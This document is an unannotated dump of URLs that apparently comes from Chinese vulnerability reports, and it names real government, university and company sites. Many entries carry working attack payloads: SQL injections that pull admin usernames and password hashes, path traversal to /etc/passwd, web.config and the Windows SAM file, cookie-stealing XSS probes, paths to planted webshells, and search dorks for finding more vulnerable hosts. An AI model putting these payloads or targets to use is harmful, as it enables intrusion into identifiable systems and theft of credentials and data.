http://www.xuhuicable.com/news_list.asp?nid=16 http://www.sjzanfang.com/prod.asp?nid=18 http://www.sjzhaohan.com/products.asp?nid=4 http://lcqfgg.com/show.asp?unid=42&nid=10 http://wooyun.org/bugs/wooyun-2010-053107 http://xxx.gov.cn/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG&nowPage=331 http://74.125.235.191/#newwindow=1&q=inurl:riseapprove_web http://222.184.252.158:9080/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG'&nowPage=331 http://58.221.162.227:9080/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG'&nowPage=331 http://zwdt.tz.gov.cn/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG'&nowPage=331 http://58.221.232.44:9080/riseapprove_web/sencondPage/moreResultFormulaxg.do?depNO=JS061200FG'&nowPage=331 http://id.sspu.edu.cn:8888/uid/forget http://id.sspu.edu.cn:8888/uid/forget http://222.66.97.103:8080/CEAEC/rule/loginAction_sentValidateCode.do http://www.nblife.com/test.aspx http://www.nblife.com/news/news.aspx?id=2 http://www.nblife.com/news/news.aspx?id=2 http://www.sqlmap.org www.nblife.com\session http://www.nblife.com:80/404.htm http://218.205.252.22:8080/bzwcity/wap/welcome.action?phone= http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1 http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1 http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1 http://60.30.83.134:8088/govAManage.do?type=zcfg_info&id=Pol2013050813460721&index=1 http://wapah.189.cn/ http://zyxw.jlu.edu.cn/manage/topic_list.php?cid=135 http://ywc.jlu.edu.cn/modue/contentTemplate.php?id=1382 http://ywc.jlu.edu.cn/modue/contentTemplate.php http://xiaobao2.jlu.edu.cn/read.php?id=66 http://www.bjhmoh.cn/index.php?r=archives/video/list&id=162 http://mail.**.edu.cn IP:210.39.*** Time:2014.05.24 x55.me/ref.php user:proxyGet&sid=BARrNLUUUlAwDLwyDaUUqmrWcdUAhYrj&mid=1:1tbiAQAOBVC9aUS31AAEst&url=%2Fcoremail%2FXJS%2Fimages%2Fing_yellow.gif http://x55.me/ref.php http://baolai.hz.letv.com/php/balaiadd.php http://tv.tsinghua.edu.cn/mcms/?p=2742 http://www.bysj.zjut.edu.cn/train/login http://www.iwoshare.com/getFriendsByUser/1 http://vshare.wo.com.cn/ http://202.204.213.10/gerenzhuye.php?user_id=140 http://zdb.anyang.gov.cn/DownloadShow.asp?ID=25 http://dir.minigame.qq.com/cgi-bin/QQGame_RichPayerInfo/get_player_info?callback=mm_callback&uin= http://oa.letv.com/ http://www.soyun.org/cha_api.php?so=letv.com&auto= http://sports.m.letv.com/sports/basketballTable/create?match_type=230 http://service.js.10086.cn/act_js/activity_web/1255/index.html#home http://joyearcars2014happy.hz.letv.com/ http://joyearcars2014happy.hz.letv.com/php/joyearcar.php?callback=jQuery17106190212650690228_1400858346260&username=wooyun&tel=18688888888&email=wooyun@126.com&chex=%E6%99%AF%E9%80%B8SUV&prav=%E4%B8%8A%E6%B5%B7&city=%E4%B8%8A%E6%B5%B7&addre=%E4%B8%8A%E6%B5%B7%E4%B8%9C%E4%BB%AA%E6%B1%BD%E8%BD%A6%E8%B4%B8%E6%98%93%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400858382500 http://www.tcom.gov.cn/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content&TableType=BackgroundContent http://www.tcom.gov.cn//siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123%27%20and%201=@@version%20and%201=%271 http://www.tcom.gov.cn/qd/default.asp http://www.tyut.edu.cn/211/DownloadShow.asp?ID=85 http://www.scxd.gov.cn/index.do http://219.239.44.26/UDS/Views/Home/Index.aspx, http://www.taodocs.com/p-3099622.html http://lib.ncu.edu.cn/readerservice/lib_news.asp?n1=10 http://supramol.jlu.edu.cn/Categories.php?id=1 http://phy60.jlu.edu.cn/categories.php?id=3 http://phy60.jlu.edu.cn/categories.php?id=3 http://bgs.tsu.edu.cn/db/DownloadShow.asp?ID=3 http://xsc.zhjnc.edu.cn/DownloadShow.asp?ID=16 http://mba.jlu.edu.cn/newmba/dean_speech.php?sid=215 http://jmyq.buct.edu.cn/www/DownloadShow.asp?ID=90 http://zcc.hnfnu.edu.cn/DownloadShow.asp?ID=64 http://218.60.146.180:9090/monitor/apoList.do?formAction=search&type=1 http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php?id=1 http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php http://biz.finance.sina.com.cn/search/dict/search.php?sp_ns=o http://oneplusbbs.com/home.php?mod=task&do=view&id=1 http://oneplusbbs.com/home.php?mod=task&do= http://phy.jlu.edu.cn/admin/showimg.php?tablename=cms_article&id=921&fieldprefix=imgnews http://phy.jlu.edu.cn/admin/showimg.php?tablena http://phy.jlu.edu.cn/admin/showimg.php?tablena http://zj.tobacco.gov.cn/wzzyz/.svn/entries http://kjcg.jlu.edu.cn/pages/kjdjxx/read.aspx?id=55 http://blog.sina.com.cn/u/3974702777 http://t1.lizhi.fm/ http://t1.lizhi.fm/t1.php http://art.jlu.edu.cn/jxgz_c.php?file_id=1178 http://218.26.173.92/baoming/zjy/DMleft.asp http://218.26.173.92/zjysys/zjy/DMTable.asp?tableName=INFOLIB http://chemlab.jlu.edu.cn/2006/index.php?M=index&F=chemlab&itemId=4&id=1 http://www.techbridge-inc.com/ http://x55.me/geo.htm http://58.30.53.227:9080/login.action http://58.30.53.227:9080/Silic.jsp http://www.baidu.com/s?wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A56628124%2056626870 http://ps.imau.edu.cn/anmai/login.aspx http://koubei.baidu.com/未对要查看的网站域名过滤导致存在反射性跨站。 http://koubei.baidu.com/s/www.google.com/';test=123;a= http://bbs.yy.com/home.php?mod=task&do=delete&id=3 http://bbs.yy.com/home.php?mod=task&do=draw&id=3 http://www.jiankongbao.com/server-status http://110.167.122.138:8080/login/corp.action http://110.167.122.138:8080/Silic.jsp http://113.140.70.184:4023/sxpt/index.action http://www.smdx.gov.cn/FCKeditor http://www.sogou.com/sogou?query=%27%2Balert%28document.cookie%29%2B%27&ie=utf8&_ast=1400934144&_asf=null&w=01029901&pid=sogou-netb-5dc126b503e374b0-8537&duppid=1&p=40040702&dp=1&cid=null&sut=2967&sst0=1400934101229&lkt=0%2C0%2C0 http://www.600280.com:81/login.action http://wwwb.swufe.edu.cn/oa_18/info/dtxxdetail.asp?dept=062&dtime=2014/05/22%2016:59:05&dtnum=1 http://sgyjzx.swufe.edu.cn/researchcontent.asp?id=6 http://sgyjzx.swufe.edu.cn/newscontent.asp?id=166 http://sgyjzx.swufe.edu.cn/recruitmentcontent.asp?id=14 http://sgyjzx.swufe.edu.cn/exchangecontent.asp?id=13 http://m.jinjianginns.com/user/login?phone=&tip=%E7%99%BB%E5%BD%95%E4%B9%8B%E5%90%8E%E6%89%8D%E8%83%BD%E6%9F%A5%E7%9C%8B%E4%BC%98%E6%83%A0%E5%88%B8%2C%E8%AF%B7%E5%85%88%E7%99%BB%E5%BD%95~&channel=HOTELVP_JJZX_WAP http://www.hasee.com/cn/NewsWindow_Index.html?datetime=2014*&newswindow=selectdate http://dzb.hasee.com/english/products/showpicture.asp?ud=16&id=661 http://www.ccgp-jiangxi.gov.cn/jsp.jsp http://www.jxzfcg.gov.cn/ http://www.bloody.tw/ru/ru.rar http://www.qd.sdu.edu.cn/guestbook/index.php http://demo.songcms.com/?m1/fnews/l/w%33%36%30%25%27%29%20%61%6E%64%20%31%3D%32%20%55%4E%49%4F%4E%20%53%45%4C%45%43%54%20%31%2C%32%2C%33%2C%63%6F%6E%63%61%74%28%75%73%65%72%28%29%2C%30%78%37%63%2C%64%61%74%61%62%61%73%65%28%29%29%2C%35%2C%36%2C%37%2C%38%2C%39%2C%31%30%2C%31%31%2C%31%32%2C%31%33%2C%31%34%2C%31%35%2C%31%36%23 inurl:Admin/pass/login.asp http://61.186.207.8/ScientificResearch/login/login.jsp http://222.177.23.155:9002/result cn:8088 http://uems.sysu.edu.cn/jwxt/ www.dghyjz.com www.hongqingzhi.com www.shengxianmj.com www.kebian.net www.xinpeng168.com www.dgxyyq.net www.gddspjs.com www.0769xs.net www.hsfzy.com www.dgjianlifz.com www.dgdezheng.com www.juxingyp.com www.15818366850.com www.dgrjzy.com www.tianfeng666.com www.dgsanduo.com www.szbafwgs.com www.dghkbz.com www.shifeng-china.com www.dgqyzc.com www.wonderachem.com www.jilongjixie.com www.aubiter.com www.guanshenhuagong.com www.dongjun2000.com www.dgqifei.com www.gdfeiyu.com www.xqjx100.com www.haoyutest.com www.dgddjt.com www.shunyuanjc.com www.0769huixin.com www.dgyinfa.com www.0769liangfa.com www.keqin88.com www.cppdg.com www.wanyangxc.com www.dgfs68.com http://*web*/upfileform.asp http://www.sbc-usst.edu.cn/search.asp http://www.ytl360.com/dede/ http://www.ytl360.com/uploads/a.php http://fytz.njnu.edu.cn/7.tzdt/small.asp?newsid=763 https://github.com/zengjianjay/alizycg/blob/1cae1988a2dd0f5dce6ce815529030ce122ed4bc/config/application.rb http://alibaba-inc.com https://l***a-inc.com/***=kelude http://k.alibaba-inc.com http://k.alibaba-inc.com/admin/machines http://k.alibaba-inc.com/****/machine_list.htm http://nxlwtv.com.cn http://wooyun.org/bugs/wooyun-2014-059954 loader:URLLoader http://www.haicang.gov.cn:106/ http://www.haicang.gov.cn:106/adm/index.asp http://222.76.226.100:106/doc/news_201452513192.asp http://218.17.55.108:8081/api http://218.17.55.108:100/ http://218.17.55.108:100/admin/home/即可操作管理员账户,密码也是明文的。 fengjing.com/fengjing123 http://localhost/maccms8/admin/?m=template-list-path-../template/ http://www.lhjy.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp http://www.zjdeqing.lm.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp http://www.lhrlzyw.com/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp http://www.dqlm.com/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp http://www.fzjob.net:9090/tabledownload/download.jsp?url=Dredboy5711%5Cjxfzweb%5Ctabledownload%5C&id=&filename=download.jsp http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 http://piwik.tutuso.cn:9200 http://stud.hqu.edu.cn/xscgz/ok/qicais.asp?id=7840 http://m.t3.com.cn/quickReg http://m.t3.com.cn/?x=pIjFRSCVrVAvT0WlsseHTw http://m.t3.com.cn/index http://test.data.ent.sina.com.cn/ http://test.data.ent.sina.com.cn/movie/23636 https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E6%96%B0%E5%8A%BF%E5%8A%9B%E7%BD%91%E7%BB%9C&safe=strict http://jw.xpu.edu.cn/Notices.asp?id=26&bh=174 http://cw.xaut.edu.cn/Notice_and_Announcement.asp?id=12&bh=233 http://zfgaxy2012.nwupl.cn/Colleage_news.asp?id=13&bh=241 http://hqjt.xidian.edu.cn/News_center.asp?id=19&bh=556 http://zwc.xauat.edu.cn/General_Dynamic.asp?id=14&bh=209 http://www.kanchufang.com:9200/ http://17wo.cn/ForgetPassword.action http://17wo.cn/FlowRedPacket!enterSendFlowRedPacket.action?pageName=sentdirect http://17wo.cn/FlowRedPacket!sendRedPacketList.action http://space.yaolan.com/****你的ID****/share http://u9service.ufida.com.cn/servicehome/kmview.aspx?postid=ZS20130408008 http://www.epiaogo.com/ http://www.epiaogo.com/bus/pay.html?TradeCode=xxxxxxxxx http://buy.modernsky.com/index.php?controller=ucenter&action=order_detail&id=296 https://220.181.46.210//js/kindeditor/php/file_manager_json.php?path=/ http://zt.chevip.com/jingpin/content.php?id=62 http://zt.chevip.com/jingpin/?cateid=2 https://github.com/joey-he8x/ytpp_app/blob/f5af1e315c60ffca312c86f104c988feb9dbe95f/config/ldap.yml https://github.com/joey-he8x/ytpp_app/blob/2d06ea39da60be1ffd892511746b5bc141296971/app/views/index/index.html.erb https://svn.kuali.org/repos/foundation/tags/kuali-jdbc-2.0.0/src/test/java/org/kuali/common/jdbc/DefaultDatabaseServiceTest.java http://db.12ha.com/Index.aspx?GameCateID=88%7C88%7C88%7C88&type=zhiyejineng&attributeID=254%7C259%7C256%7C257&pclass=%u804c%u4e1a&cclass=%u6218%u58eb&key=%7C-%7C%u6218%u58eb%7C http://learning.citicbank.com/ http://122.226.122.196/reg/username_exists/?username=,其中这个username就是注入点,工具一跑就直接爆出问题了。 http://www.yzu.edu.cn:80/vc/vc/interface/styletop/sitecount_interface.jsp?i_id=7 http://zhfx.guosen.com.cn/jrtz/invest/fund.shtml http://coc.jianshe99.com http://www.hfrc.com/ http://u8dev.yonyou.com/help/index.aspx?key=1 http://www.grny.gov.cn/grny/images/stories/download.php?filename=download.php http://zzz.lgq.gov.cn/admin/infofiles/download.php?filepath=./download.php&filename=download.php http://fwpt.hnjgdj.gov.cn/web/download.action?fileName=../../index.jsp http://bdanews.bda.gov.cn/front/download.action?fileName=index.jsp http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=/netweb/detail/&filename=download.jsp http://www.cqldbz.gov.cn/wssb/download.jsp?filename=../index.jsp http://www.hbcy.gov.cn/application/bgxz/download.jsp?filename=F:/web_changyang/public_html/application/bgxz/index.jsp http://www.eqsc.gov.cn/manage/content/docmanage/download.jsp?filePath=/manage/content/docmanage/download.jsp http://www.hazk.lss.gov.cn/12333/web/secondLevelPage/download.jsp?filename=../../../index.jsp http://jld.cq.gov.cn/bgxz/download.jsp?filename=../index.jsp http://www.cdetdz.gov.cn/edp/edpweb/downLoad.jsp?diskURL=D:/bssoft/edp/WebRoot/edpweb/downLoad.jsp&fileName=index.jsp http://www.symzj.gov.cn/symz/mzxxw/zlxz/download.jsp?filename=../../../index.jsp http://fwzx.bjpg.gov.cn/xzfwzx/system/download.jsp?filename=../download.jsp http://www.szwen.gov.cn/download.jsp?fileName=download.jsp http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=C:\windows\system32\&filename=cmd.exe http://www.ahmasepa.gov.cn:8088/masWeb/jsp/include/download.jsp?filename=../index.jsp http://www.js.lss.gov.cn/Auditing/download.jsp?filename=../index.jsp http://www.jiaohe.gov.cn/main/download.jsp?fileName=../index.jsp http://www.ccfwy.gov.cn/wjxz/download.jsp?filename=../index.jsp http://sh.hljagri.gov.cn/download.jsp?filename=../index.jsp http://www.qzlyj.gov.cn/download.jsp?filename=../../index.jsp http://www.ccgp-qinghai.gov.cn/download.jsp?filename=C:\Windows\System32\config\SAM http://www.nbzj.gov.cn/cms/1120/plus/download.php?open=edit&link=download.php http://xxx.kugou.com/news/list?cid=xx http://games.kugou.com http://wap.soufun.com/bbs/verifyphonenum.php?area=sh&version=3g http://www.waipojia.com.cn/crm/Index.aspx?parenttab=Site&module=Notice&action=Index http://www.wandafilm.com/ http://www.wandafilm.com/baseInfo/point/m_init.html http://www.wandafilm.com/baseInfo/point/point_trade.do?m=showGiftDetail&giftId=20130913102134479681 http://ncd.org.cn/Login http://yd.zjjgs.gov.cn/admin/ http://www.mailer.com.cn/Products6.html http://www.mailer.com.cn/New%20Customers/index1.htm http://mail.lyx928.com:8080 http://mail.njzj.gov.cn:8080 http://mail.shszx.gov.cn:8600 http://wooyun.org/bugs/wooyun-2010-049533 http://glxy.mot.gov.cn/BM/index.html http://192.168.90.206:1933/ProductShow.asp?id=7 inurl:/Products.asp?BigClass= http://hljlyzn.com/Products.asp?BigClassID=45 http://sqlmap.org http://wswz.anhuinews.com/search.html http://wswz.anhuinews.com/search.html http://www.gogomusic.cn/ https://wt.westsecu.com/web-console/ http://www.ch.zju.edu.cn/lishi/admin/Index.asp http://www.lxjx.cn/ http://www.bpeg.nc.sgcc.com.cn/ww/contenttest.asp?newsid=&newsformid=XXFBDWB&newssheetno=1309250004&newsisold=0 http://pan.baidu.com/s/1gdDtg8F http://www.bbbao.com/user/fix_user_name http://www.bbbao.com/user/fix_user_name?user_name_new=aaaatt http://nl.yaolan.com/onlineConsultForm!AddonlineConsult.action http://XXXXX/jwweb/JXZY/INFO_Teacher.aspx?id=XXXXXX http://220.181.154.150:8080/welcome.do http://220.181.154.150:8080/admin/login.jsp http://www.threeoa.com/case/遍及全国! inurl:action http://jdyz.ijd.cn/findRssPortalRssAction.action?siteId=jdyz&type=0 http://www.jmsyz.net/findRssPortalRssAction.action?siteId=jms&type=1 http://www.mzlyz.cn/findRssPortalRssAction.action?siteId=mzlyz&type=1 http://portal1.dhu.cc/toRecruitRecruitSetAction.action http://zs.xhedu.sh.cn/toRecruitRecruitSetAction.action http://cdpc.dg.gov.cn/dw.jsp?path=E:%5Cwebsite_backup/newbackuup/webapps/ROOT/upload.htm&action=down http://www.eee.cn/yizhi/list_inc/miyu_list_inc.jsp?app=reping&type=4 http://www.eee.cn/manager.do http://www.eee.cn/manager.do http://u.uzai.com/manage/personal-info http://qls.hfut.edu.cn/xwzx_details.php?articles=191存在sql注入; http://www.jumbotcms.net/ajax/content.aspx?cType=soft&id=22&oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF3 http://slcredit.dg.gov.cn/credit/details.jsp http://slcredit.dg.gov.cn/credit/reDuh.jsp http://220.168.55.61/yhmm.html http://220.168.55.61/system/siteInfo/content_articleManager.do?websiteId=1&channelId=322&pkId=1&handleId=1&formName=/WEB-INF/web.xml http://220.168.55.61//user_base/notification/2014/5/27/silicwebshell.jsp http://www.ly.com/flight/FlightPriceNew.aspx?ajax=GetPageData&OrgPort=CSX&DesPort=&Sort=&CurrPage=2 http://wooyun.org/bugs/wooyun-2010-055900 http://www.gzgrain.com/(广州穂粮集团网址) http://www.gzgrain.com/pic_news/chubei1.asp?xm_table=jieyun(出现问题的地址) http://www6.customs.gov.cn/changchun/tabid/62940/ctl/Admin/mid/173998/Default.aspx http://www.soso.com/q?ie=utf-8&sc=web&pid=-s.idx.se&cid=s.idx.se&query=%27%2Balert%28%2F5up3rc%2F%29+%2B%27&w=&sut=4849&sst0=1401102355181&lkt=9%2C1401102351461%2C1401102355052 http://wxfw.heinfo.gov.cn:8043/admin/System/AMeta.aspx http://wxfw.heinfo.gov.cn:8043/admin/Layout/Category.aspx http://wxfw.heinfo.gov.cn:8043/admin/Statistic/UserStats.aspx http://www.qjnywlw.gov.cn:8887/admin/ExField.aspx http://app.gdgs.gov.cn:8888/aicccps/admin/Support_List.jsp http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_Edit.jsp?newID=396cf401-0128-1000-e000-0000c0a8647e http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_List.jsp http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_Edit.jsp?newID=492b4d2b-0128-1000-e000-0024c0a8647e http://www.phpsay.com/ www.phpsay.com http://x213.com/ http://www.wxx.me/ www.17t7.com www.haodar.com http://60.22.23.103:9999 http://60.22.23.103:9999/ChangePassword.aspx http://t.xunkoo.com/home/search?w=%E6%97%85%E6%B8%B8 http://event.youku.com/siemens-home/openthekitchen2013/save.php?action=pclist&foodType=7&page=0 http://spp.hunantv.com/.svn/entries http://spp.hunantv.com/tt.php inurl:extLybWebAction https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=inurl:extLybWebAction&safe=strict&start=0 http://www.jhzx.gov.cn/zycms/extLybWebAction!queryRed.shtml http://www.zjlxlss.gov.cn/zycms4/extLybWebAction!addWS.shtml?extLybType=3 http://www.lxztb.gov.cn/zycms/extLybWebAction!listjh.shtml http://jhztb.gov.cn/zycms/extLybWebAction!add.shtml http://www.jhjxw.gov.cn/zycms/extLybWebAction!queryWy.shtml http://60.191.198.109:8889/zycms/extLybWebAction!listTsRed.shtml?extLybType.id=2&letter=0 http://old.zjwy.gov.cn/zycms4_info/extLybWebAction!listJh.shtml?currentSite=27&extLybType.id=28&page.pageSize=10&replay=2 http://info.jinhua.gov.cn/zycms4_info/extLybWebAction!listJh.shtml?currentSite=27&extLybType.id=21&page.pageSize=10&replay=2 http://www.jhlsxh.com.cn/zycms4/extLybWebAction!listJh.shtml?currentSite=1&extLybType.id=1&page.pageSize=10&replay=2 http://220.191.229.228/zycms4_info/extLybWebAction!listJh.shtml?currentSite=27&extLybType.id=23&page.pageSize=10&replay=2 http://wygjj.com/zycms4_info/extLybWebAction!search.shtml http://221.192.155.172:7001/showSrvLink.action http://ittools.lhspzx.com/teacher/weboffice/GetExtname.ashx?id=1 http://fzpt.hyxyxx.com/teacher/weboffice/GetExtname.ashx?id=1 http://it.qzgjzx.cn/teacher/weboffice/GetExtname.ashx?id=1 http://61.175.224.187:888/teacher/weboffice/GetExtname.ashx?id=1 http://wsyj.dg6z.net:81/teacher/weboffice/GetExtname.ashx?id=1 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=2 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=3 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=4 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=5 http://jxt.yb10010.com/Public/ShowList.aspx?lm_ID=2 http://u.uzai.com/manage/UserTouristDetail-1-323659.html http://u.uzai.com/manage/UserTouristDetail-0-323665.html http://try.mama.cn/admin/user_info.php?bbirth=1 http://club.xywy.com/yszs/test_expert_online.php?type=data&uid=3129058 http://mail.liby.com.cn/loginAfter.action http://zhidao.auto.sohu.com/browse/home.html https://github.com/momoplan/chlw/blob/068919a6dec7cc6b09de990f4ca68d7a4c658e8c/src/com/ruyicai/util/testEmail.java http://ruyicai.com进行注册,模拟找回密码过程。 ruyicai.com/ruyicai1234登陆 inurl:/riseapprove_web/secondPage/ http://58.221.162.227:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.206.243:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://zwdt.tz.gov.cn/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://222.184.252.158:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.232.44:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.162.227:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.206.243:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://zwdt.tz.gov.cn/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://222.184.252.158:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://58.221.232.44:9080/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://bsdt.nantong.gov.cn/riseapprove_web/secondPage/proceedingDetail.do?item_ID=JS060000AJ-CF-0252&workType=3 http://www.changedu.com/ inurl:ShowFiles/BookEquList.aspx http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx?用户单位:南京林业大学 http://210.29.132.248/ShowFiles/BookEquList.aspx?用户单位:南京师范大学化学与材料科学学院 http://sjjx.njit.edu.cn/sy/share/ShowFiles/BookEquList.aspx?用户单位:南京工程学院 http://web168444.5udns.cn/ShowFiles/BookEquList.aspx?用户单位:也是南京师范的 http://ies.hhit.edu.cn/ShowFiles/BookEquList.aspx http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx http://www.fsmcms.com.cn/ http://www.fsmcms.com.cn/html/p/p_13/p_13.html site:gov.cninurl:webapp/preview.jsp http://www.fsmcms.com.cn/ http://www.fsmcms.com.cn/html/p/p_18/p_18.html site:gov.cn inurl:cms/sites找政府网站 http://wooyun.org/bugs/wooyun-2014-062496 site:uzai.com http://chat.uzai.com,论坛系统。 http://yjszs.smmu.edu.cn/professor.aspx?pID=161 http://hf.52xinyou.cn/login.html http://bjip.buct.edu.cn/web/article.php?id=1355 http://res.hengqian.com/sort.asp?object_id=1&bb_id=29&s_id=14 http://jy.cwu.edu.cn/jyw/info_details_zhnzxysy.jsp?seq=2279 http://www.cdpx114.com/download.php?id=45 http://www.cdpx114.com/download.php?id=45 http://lswhw.ustc.edu.cn/index.php/admin/index http://www.chysoft.net http://183.61.183.189:81/ http://liuxue.xmu.edu.cn/zhzl.asp?ID=1035存在sql注入点 http://zs.zjut.edu.cn/newsDetail.jsp?id=1270 http://122.11.45.115:8080/ http://www.gaomi.gov.cn/index.asp http://spzx.gaomi.gov.cn:8088/gm/main/zf_View.jsp?type=1 http://www.mcquay.com.cn/controls/admin_index.html http://pbc.zhoushan.gov.cn/bsdt/admin/messagemgr_hf.aspx?fr_id=3693 http://pbc.zhoushan.gov.cn/bsdt/admin/ziliao.aspx http://58.83.233.44/yazuo-weixin/weixin/phonePage/getImage.do?brandId=1119&name=../../../../../../etc/passwd fd:02:b0 www.backup.com http://crm.yazuo.com/ http://58.83.233.61/index.htm http://58.83.233.57/index.html http://58.83.233.56/ http://www.yazuo.com/ http://58.83.233.44/yazuo-weixin/weixin/ inurl:common_info.action https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=inurl:common_info.action&safe=strict http://mgs.homeinns.com/Login.aspx,发现什么也玩不了,然后加了个index.aspx,界面如下 http://mgs.homeinns.com/HLifeCycle/HLCSearch.aspx http://mgs.homeinns.com/HLifeCycle/HLCOldName.aspx?ProCD=P2886 http://mgs.homeinns.com/HLifeCycle/HLCOldName.aspx?ProCD=P2886'--这样就判断出来了,是盲注,所以直接用工具 domain:home http://www.jinher.com/ http://www.*****.com/c6/JHSoft.Web.Login/GetPassWord.aspx?flag=getEmail&UserName=1111 http://invest.china.com.cn/admin/test.aspx?modelName=t_BH_Content_ZiXunXinXi&f_content_ID=3071 http://invest.china.com.cn/admin/test.aspx?modelName=t_BH_Content_ZiXunXinXi&f_content_ID=99999999 http://invest.china.com.cn//admin/test.aspx?modelName=t_BH_Content_ZiXunXinXi&f_content_ID=2196 http://invest.china.com.cn//admin/test.aspx?modelName=t_BH_Content_ZiXunXinXi&f_content_ID=99999999 inurl:spdt_listSp.action https://www.google.com.hk/search?q=inurl:spdt_listSp.action&newwindow=1&safe=strict&hl=zh-CN&noj=1&site=webhp&ei=_KiEU42cIoj68QW63YKgBw&start=10&sa=N&biw=1366&bih=667 http://www.wooyun.org/bugs/wooyun-2014-062573/trace/e36db0b695b609dc4f06687f61f3f8db http://city.vbmcms.com/wap/index.php?mod=store&userid=chunmiao http://city.vbmcms.com/search.php?part=news&keywords=111 http://vanclgroup.googlecode.com/svn/wiki/ http://119.253.53.23/ http://119.253.53.23/Shelf/Clothes?productCode= xxx:Header xx:PHPSESSID http://mach.jlu.edu.cn/hb_images/news/show.php?id=4331 http://www.189.cn/ http://oice.nenu.edu.cn/page/news/liuxue_newsDetail.php?type=101&id=311 http://www.cngy.gov.cn/www.cngy.gov.cn.zip http://jyj.nanyue.gov.cn/jyxx/manage/download.aspx?File=../web.config site:gov.cn inurl:download.aspx inurl:download.aspx site:net inurl:download.aspx site:com inurl:download.aspx http://bbs.eos.changyou.com/uc_server/admin.php http://jtj.daqing.gov.cn/uploadfiles/XGXZ/2011/11/VPN%E8%BF%9E%E6%8E%A5%E5%B8%AE%E5%8A%A9%E6%96%87%E4%BB%B6.doc https://www.google.de/#filter=0&newwindow=1&q=inurl:/zlxz/down.aspx&start=0 http://122.226.168.166/webhouse/test.aspx http://www.lhfgc.gov.cn/webhouse/test.aspx http://www.wlfc.gov.cn/webhouse/test.aspx http://www.weitv.com/index.php?s=Admin/Login http://house.focus.cn/ijiayuan/ijy_wq.php?id=181 http://house.focus.cn/ijiayuan/ijy_wq.php?id=181'%20and%201=1%23 http://house.focus.cn/ijiayuan/ijy_wq.php?id=181'%20and%201=2%23 http://www.zoomla.cn/down/Zoomla!CMS2_X1.0.rar http://www.zoomla.cn/down/Zoomla!CMS2_x1.1.rar http://www.szgwbn.net.cn/sgw_best.aspx?parentID=1 http://www.yawsj.gov.cn/install/setup.aspx http://www.pzhcz.gov.cn/cznt/install/install.aspx?step=dbset http://config.baofeng.com http://sro.swjtu.edu.cn/ http://yscb.swjtu.edu.cn/ http://yscb.swjtu.edu.cn/help.asp http://202.115.67.239 http://202.115.75.3/ http://202.115.75.6 http://www.xnlr.gov.cn/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%250 site:www.xnlr.gov.cn http://wap.189kan.net/admin/left.jsp 